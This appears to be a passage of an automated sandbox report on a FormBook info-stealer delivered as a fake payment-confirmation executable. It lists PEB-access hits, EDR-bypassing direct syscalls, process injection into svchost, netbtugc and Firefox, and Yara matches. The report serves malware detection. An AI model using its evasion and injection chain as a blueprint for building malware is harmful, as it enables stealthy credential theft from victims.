Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030ACA72 mov eax, dword ptr fs:[00000030h]	2_2_030ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030ACA72 mov eax, dword ptr fs:[00000030h]	2_2_030ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]	2_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]	2_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]	2_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]	2_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]	2_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]	2_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]	2_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]	2_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]	2_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03104A80 mov eax, dword ptr fs:[00000030h]	2_2_03104A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03068A90 mov edx, dword ptr fs:[00000030h]	2_2_03068A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03038AA0 mov eax, dword ptr fs:[00000030h]	2_2_03038AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03038AA0 mov eax, dword ptr fs:[00000030h]	2_2_03038AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03086AA4 mov eax, dword ptr fs:[00000030h]	2_2_03086AA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03086ACC mov eax, dword ptr fs:[00000030h]	2_2_03086ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03086ACC mov eax, dword ptr fs:[00000030h]	2_2_03086ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03086ACC mov eax, dword ptr fs:[00000030h]	2_2_03086ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03030AD0 mov eax, dword ptr fs:[00000030h]	2_2_03030AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03064AD0 mov eax, dword ptr fs:[00000030h]	2_2_03064AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03064AD0 mov eax, dword ptr fs:[00000030h]	2_2_03064AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306AAEE mov eax, dword ptr fs:[00000030h]	2_2_0306AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306AAEE mov eax, dword ptr fs:[00000030h]	2_2_0306AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AE908 mov eax, dword ptr fs:[00000030h]	2_2_030AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AE908 mov eax, dword ptr fs:[00000030h]	2_2_030AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030BC912 mov eax, dword ptr fs:[00000030h]	2_2_030BC912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03028918 mov eax, dword ptr fs:[00000030h]	2_2_03028918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03028918 mov eax, dword ptr fs:[00000030h]	2_2_03028918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B892A mov eax, dword ptr fs:[00000030h]	2_2_030B892A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C892B mov eax, dword ptr fs:[00000030h]	2_2_030C892B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B0946 mov eax, dword ptr fs:[00000030h]	2_2_030B0946
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03056962 mov eax, dword ptr fs:[00000030h]	2_2_03056962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03056962 mov eax, dword ptr fs:[00000030h]	2_2_03056962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03056962 mov eax, dword ptr fs:[00000030h]	2_2_03056962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0307096E mov eax, dword ptr fs:[00000030h]	2_2_0307096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0307096E mov edx, dword ptr fs:[00000030h]	2_2_0307096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0307096E mov eax, dword ptr fs:[00000030h]	2_2_0307096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D4978 mov eax, dword ptr fs:[00000030h]	2_2_030D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D4978 mov eax, dword ptr fs:[00000030h]	2_2_030D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030BC97C mov eax, dword ptr fs:[00000030h]	2_2_030BC97C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]	2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]	2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]	2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]	2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]	2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]	2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]	2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]	2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]	2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]	2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]	2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]	2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]	2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030309AD mov eax, dword ptr fs:[00000030h]	2_2_030309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030309AD mov eax, dword ptr fs:[00000030h]	2_2_030309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B89B3 mov esi, dword ptr fs:[00000030h]	2_2_030B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B89B3 mov eax, dword ptr fs:[00000030h]	2_2_030B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B89B3 mov eax, dword ptr fs:[00000030h]	2_2_030B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C69C0 mov eax, dword ptr fs:[00000030h]	2_2_030C69C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0303A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0303A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0303A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0303A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0303A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0303A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030649D0 mov eax, dword ptr fs:[00000030h]	2_2_030649D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FA9D3 mov eax, dword ptr fs:[00000030h]	2_2_030FA9D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030BE9E0 mov eax, dword ptr fs:[00000030h]	2_2_030BE9E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030629F9 mov eax, dword ptr fs:[00000030h]	2_2_030629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030629F9 mov eax, dword ptr fs:[00000030h]	2_2_030629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030BC810 mov eax, dword ptr fs:[00000030h]	2_2_030BC810
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]	2_2_03052835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]	2_2_03052835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]	2_2_03052835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03052835 mov ecx, dword ptr fs:[00000030h]	2_2_03052835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]	2_2_03052835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]	2_2_03052835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306A830 mov eax, dword ptr fs:[00000030h]	2_2_0306A830
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D483A mov eax, dword ptr fs:[00000030h]	2_2_030D483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D483A mov eax, dword ptr fs:[00000030h]	2_2_030D483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03042840 mov ecx, dword ptr fs:[00000030h]	2_2_03042840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03060854 mov eax, dword ptr fs:[00000030h]	2_2_03060854
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03034859 mov eax, dword ptr fs:[00000030h]	2_2_03034859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03034859 mov eax, dword ptr fs:[00000030h]	2_2_03034859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030BE872 mov eax, dword ptr fs:[00000030h]	2_2_030BE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030BE872 mov eax, dword ptr fs:[00000030h]	2_2_030BE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C6870 mov eax, dword ptr fs:[00000030h]	2_2_030C6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C6870 mov eax, dword ptr fs:[00000030h]	2_2_030C6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03030887 mov eax, dword ptr fs:[00000030h]	2_2_03030887
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030BC89D mov eax, dword ptr fs:[00000030h]	2_2_030BC89D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305E8C0 mov eax, dword ptr fs:[00000030h]	2_2_0305E8C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FA8E4 mov eax, dword ptr fs:[00000030h]	2_2_030FA8E4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306C8F9 mov eax, dword ptr fs:[00000030h]	2_2_0306C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306C8F9 mov eax, dword ptr fs:[00000030h]	2_2_0306C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E6F00 mov eax, dword ptr fs:[00000030h]	2_2_030E6F00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03032F12 mov eax, dword ptr fs:[00000030h]	2_2_03032F12
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306CF1F mov eax, dword ptr fs:[00000030h]	2_2_0306CF1F

Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe

Code function: 0_2_00990B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

0_2_00990B62

Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe	Code function: 0_2_00962622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00962622
Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe	Code function: 0_2_0095083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0095083F
Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe	Code function: 0_2_009509D5 SetUnhandledExceptionFilter,	0_2_009509D5
Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe	Code function: 0_2_00950C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00950C21

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\kDjmhbhFFzkBENzGPUmdIzfZZimhItOnREKBfodTAWvDdl\AYTxDBtmuwEKbeELUJqkhnctN.exe	NtWriteVirtualMemory: Direct from: 0x77762E3C	Jump to behavior
Source: C:\Program Files (x86)\kDjmhbhFFzkBENzGPUmdIzfZZimhItOnREKBfodTAWvDdl\AYTxDBtmuwEKbeELUJqkhnctN.exe	NtMapViewOfSection: Direct from: 0x77762D1C	Jump to behavior
Source: C:\Program Files (x86)\kDjmhbhFFzkBENzGPUmdIzfZZimhItOnREKBfodTAWvDdl\AYTxDBtmuwEKbeELUJqkhnctN.exe	NtNotifyChangeKey: Direct from: 0x77763C2C	Jump to behavior
Source: C:\Program Files (x86)\kDjmhbhFFzkBENzGPUmdIzfZZimhItOnREKBfodTAWvDdl\AYTxDBtmuwEKbeELUJqkhnctN.exe	NtCreateMutant: Direct from: 0x777635CC	Jump to behavior
Source: C:\Program Files (x86)\kDjmhbhFFzkBENzGPUmdIzfZZimhItOnREKBfodTAWvDdl\AYTxDBtmuwEKbeELUJqkhnctN.exe	NtResumeThread: Direct from: 0x777636AC	Jump to behavior
Source: C:\Program Files (x86)\kDjmhbhFFzkBENzGPUmdIzfZZimhItOnREKBfodTAWvDdl\AYTxDBtmuwEKbeELUJqkhnctN.exe	NtProtectVirtualMemory: Direct from: 0x77757B2E	Jump to behavior
Source: C:\Program Files (x86)\kDjmhbhFFzkBENzGPUmdIzfZZimhItOnREKBfodTAWvDdl\AYTxDBtmuwEKbeELUJqkhnctN.exe	NtQuerySystemInformation: Direct from: 0x77762DFC	Jump to behavior
Source: C:\Program Files (x86)\kDjmhbhFFzkBENzGPUmdIzfZZimhItOnREKBfodTAWvDdl\AYTxDBtmuwEKbeELUJqkhnctN.exe	NtAllocateVirtualMemory: Direct from: 0x77762BFC	Jump to behavior
Source: C:\Program Files (x86)\kDjmhbhFFzkBENzGPUmdIzfZZimhItOnREKBfodTAWvDdl\AYTxDBtmuwEKbeELUJqkhnctN.exe	NtReadFile: Direct from: 0x77762ADC	Jump to behavior
Source: C:\Program Files (x86)\kDjmhbhFFzkBENzGPUmdIzfZZimhItOnREKBfodTAWvDdl\AYTxDBtmuwEKbeELUJqkhnctN.exe	NtDelayExecution: Direct from: 0x77762DDC	Jump to behavior
Source: C:\Program Files (x86)\kDjmhbhFFzkBENzGPUmdIzfZZimhItOnREKBfodTAWvDdl\AYTxDBtmuwEKbeELUJqkhnctN.exe	NtWriteVirtualMemory: Direct from: 0x7776490C	Jump to behavior
Source: C:\Program Files (x86)\kDjmhbhFFzkBENzGPUmdIzfZZimhItOnREKBfodTAWvDdl\AYTxDBtmuwEKbeELUJqkhnctN.exe	NtQueryInformationProcess: Direct from: 0x77762C26	Jump to behavior
Source: C:\Program Files (x86)\kDjmhbhFFzkBENzGPUmdIzfZZimhItOnREKBfodTAWvDdl\AYTxDBtmuwEKbeELUJqkhnctN.exe	NtResumeThread: Direct from: 0x77762FBC	Jump to behavior
Source: C:\Program Files (x86)\kDjmhbhFFzkBENzGPUmdIzfZZimhItOnREKBfodTAWvDdl\AYTxDBtmuwEKbeELUJqkhnctN.exe	NtCreateUserProcess: Direct from: 0x7776371C	Jump to behavior
Source: C:\Program Files (x86)\kDjmhbhFFzkBENzGPUmdIzfZZimhItOnREKBfodTAWvDdl\AYTxDBtmuwEKbeELUJqkhnctN.exe	NtSetInformationThread: Direct from: 0x777563F9	Jump to behavior
Source: C:\Program Files (x86)\kDjmhbhFFzkBENzGPUmdIzfZZimhItOnREKBfodTAWvDdl\AYTxDBtmuwEKbeELUJqkhnctN.exe	NtAllocateVirtualMemory: Direct from: 0x77763C9C	Jump to behavior
Source: C:\Program Files (x86)\kDjmhbhFFzkBENzGPUmdIzfZZimhItOnREKBfodTAWvDdl\AYTxDBtmuwEKbeELUJqkhnctN.exe	NtSetInformationThread: Direct from: 0x77762B4C	Jump to behavior
Source: C:\Program Files (x86)\kDjmhbhFFzkBENzGPUmdIzfZZimhItOnREKBfodTAWvDdl\AYTxDBtmuwEKbeELUJqkhnctN.exe	NtQueryAttributesFile: Direct from: 0x77762E6C	Jump to behavior
Source: C:\Program Files (x86)\kDjmhbhFFzkBENzGPUmdIzfZZimhItOnREKBfodTAWvDdl\AYTxDBtmuwEKbeELUJqkhnctN.exe	NtClose: Direct from: 0x77762B6C
Source: C:\Program Files (x86)\kDjmhbhFFzkBENzGPUmdIzfZZimhItOnREKBfodTAWvDdl\AYTxDBtmuwEKbeELUJqkhnctN.exe	NtReadVirtualMemory: Direct from: 0x77762E8C	Jump to behavior
Source: C:\Program Files (x86)\kDjmhbhFFzkBENzGPUmdIzfZZimhItOnREKBfodTAWvDdl\AYTxDBtmuwEKbeELUJqkhnctN.exe	NtCreateKey: Direct from: 0x77762C6C	Jump to behavior
Source: C:\Program Files (x86)\kDjmhbhFFzkBENzGPUmdIzfZZimhItOnREKBfodTAWvDdl\AYTxDBtmuwEKbeELUJqkhnctN.exe	NtQuerySystemInformation: Direct from: 0x777648CC	Jump to behavior
Source: C:\Program Files (x86)\kDjmhbhFFzkBENzGPUmdIzfZZimhItOnREKBfodTAWvDdl\AYTxDBtmuwEKbeELUJqkhnctN.exe	NtAllocateVirtualMemory: Direct from: 0x777648EC	Jump to behavior
Source: C:\Program Files (x86)\kDjmhbhFFzkBENzGPUmdIzfZZimhItOnREKBfodTAWvDdl\AYTxDBtmuwEKbeELUJqkhnctN.exe	NtQueryVolumeInformationFile: Direct from: 0x77762F2C	Jump to behavior
Source: C:\Program Files (x86)\kDjmhbhFFzkBENzGPUmdIzfZZimhItOnREKBfodTAWvDdl\AYTxDBtmuwEKbeELUJqkhnctN.exe	NtOpenSection: Direct from: 0x77762E0C	Jump to behavior
Source: C:\Program Files (x86)\kDjmhbhFFzkBENzGPUmdIzfZZimhItOnREKBfodTAWvDdl\AYTxDBtmuwEKbeELUJqkhnctN.exe	NtDeviceIoControlFile: Direct from: 0x77762AEC	Jump to behavior
Source: C:\Program Files (x86)\kDjmhbhFFzkBENzGPUmdIzfZZimhItOnREKBfodTAWvDdl\AYTxDBtmuwEKbeELUJqkhnctN.exe	NtAllocateVirtualMemory: Direct from: 0x77762BEC	Jump to behavior
Source: C:\Program Files (x86)\kDjmhbhFFzkBENzGPUmdIzfZZimhItOnREKBfodTAWvDdl\AYTxDBtmuwEKbeELUJqkhnctN.exe	NtQueryInformationToken: Direct from: 0x77762CAC	Jump to behavior
Source: C:\Program Files (x86)\kDjmhbhFFzkBENzGPUmdIzfZZimhItOnREKBfodTAWvDdl\AYTxDBtmuwEKbeELUJqkhnctN.exe	NtTerminateThread: Direct from: 0x77762FCC	Jump to behavior
Source: C:\Program Files (x86)\kDjmhbhFFzkBENzGPUmdIzfZZimhItOnREKBfodTAWvDdl\AYTxDBtmuwEKbeELUJqkhnctN.exe	NtCreateFile: Direct from: 0x77762FEC	Jump to behavior
Source: C:\Program Files (x86)\kDjmhbhFFzkBENzGPUmdIzfZZimhItOnREKBfodTAWvDdl\AYTxDBtmuwEKbeELUJqkhnctN.exe	NtOpenFile: Direct from: 0x77762DCC	Jump to behavior
Source: C:\Program Files (x86)\kDjmhbhFFzkBENzGPUmdIzfZZimhItOnREKBfodTAWvDdl\AYTxDBtmuwEKbeELUJqkhnctN.exe	NtOpenKeyEx: Direct from: 0x77762B9C	Jump to behavior
Source: C:\Program Files (x86)\kDjmhbhFFzkBENzGPUmdIzfZZimhItOnREKBfodTAWvDdl\AYTxDBtmuwEKbeELUJqkhnctN.exe	NtSetInformationProcess: Direct from: 0x77762C5C	Jump to behavior
Source: C:\Program Files (x86)\kDjmhbhFFzkBENzGPUmdIzfZZimhItOnREKBfodTAWvDdl\AYTxDBtmuwEKbeELUJqkhnctN.exe	NtProtectVirtualMemory: Direct from: 0x77762F9C	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\kDjmhbhFFzkBENzGPUmdIzfZZimhItOnREKBfodTAWvDdl\AYTxDBtmuwEKbeELUJqkhnctN.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\netbtugc.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: NULL target: C:\Program Files (x86)\kDjmhbhFFzkBENzGPUmdIzfZZimhItOnREKBfodTAWvDdl\AYTxDBtmuwEKbeELUJqkhnctN.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: NULL target: C:\Program Files (x86)\kDjmhbhFFzkBENzGPUmdIzfZZimhItOnREKBfodTAWvDdl\AYTxDBtmuwEKbeELUJqkhnctN.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\netbtugc.exe

Thread register set: target process: 6012

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\netbtugc.exe

Thread APC queued: target process: C:\Program Files (x86)\kDjmhbhFFzkBENzGPUmdIzfZZimhItOnREKBfodTAWvDdl\AYTxDBtmuwEKbeELUJqkhnctN.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 467008

Jump to behavior

Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe

0_2_00991201

Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe

Code function: 0_2_00972BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00972BA5

Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe

Code function: 0_2_0099B226 SendInput,keybd_event,

0_2_0099B226

Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe

Code function: 0_2_009B22DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,

0_2_009B22DA

Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe"	Jump to behavior
Source: C:\Program Files (x86)\kDjmhbhFFzkBENzGPUmdIzfZZimhItOnREKBfodTAWvDdl\AYTxDBtmuwEKbeELUJqkhnctN.exe	Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe

0_2_00990B62

Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe

Code function: 0_2_00991663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_00991663

Source: Payment Notification Confirmation 010_01_2025.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Payment Notification Confirmation 010_01_2025.exe, AYTxDBtmuwEKbeELUJqkhnctN.exe, 00000004.00000002.3761302884.0000000000D00000.00000002.00000001.00040000.00000000.sdmp, AYTxDBtmuwEKbeELUJqkhnctN.exe, 00000004.00000000.1382542846.0000000000D00000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: AYTxDBtmuwEKbeELUJqkhnctN.exe, 00000004.00000002.3761302884.0000000000D00000.00000002.00000001.00040000.00000000.sdmp, AYTxDBtmuwEKbeELUJqkhnctN.exe, 00000004.00000000.1382542846.0000000000D00000.00000002.00000001.00040000.00000000.sdmp, AYTxDBtmuwEKbeELUJqkhnctN.exe, 00000007.00000000.1525868664.0000000001BA0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: AYTxDBtmuwEKbeELUJqkhnctN.exe, 00000004.00000002.3761302884.0000000000D00000.00000002.00000001.00040000.00000000.sdmp, AYTxDBtmuwEKbeELUJqkhnctN.exe, 00000004.00000000.1382542846.0000000000D00000.00000002.00000001.00040000.00000000.sdmp, AYTxDBtmuwEKbeELUJqkhnctN.exe, 00000007.00000000.1525868664.0000000001BA0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: ?Program Manager
Source: AYTxDBtmuwEKbeELUJqkhnctN.exe, 00000004.00000002.3761302884.0000000000D00000.00000002.00000001.00040000.00000000.sdmp, AYTxDBtmuwEKbeELUJqkhnctN.exe, 00000004.00000000.1382542846.0000000000D00000.00000002.00000001.00040000.00000000.sdmp, AYTxDBtmuwEKbeELUJqkhnctN.exe, 00000007.00000000.1525868664.0000000001BA0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe

Code function: 0_2_00950698 cpuid

0_2_00950698

Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe

Code function: 0_2_009A8195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,

0_2_009A8195

Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe

Code function: 0_2_0098D27A GetUserNameW,

0_2_0098D27A

Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe

Code function: 0_2_0096B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

0_2_0096B952

Source: C:\Users\user\Desktop\Payment Notification Confirmation 010_01_2025.exe

Code function: 0_2_009342DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_009342DE

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.3b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.3b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.1457779729.00000000003B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3761759858.0000000003630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
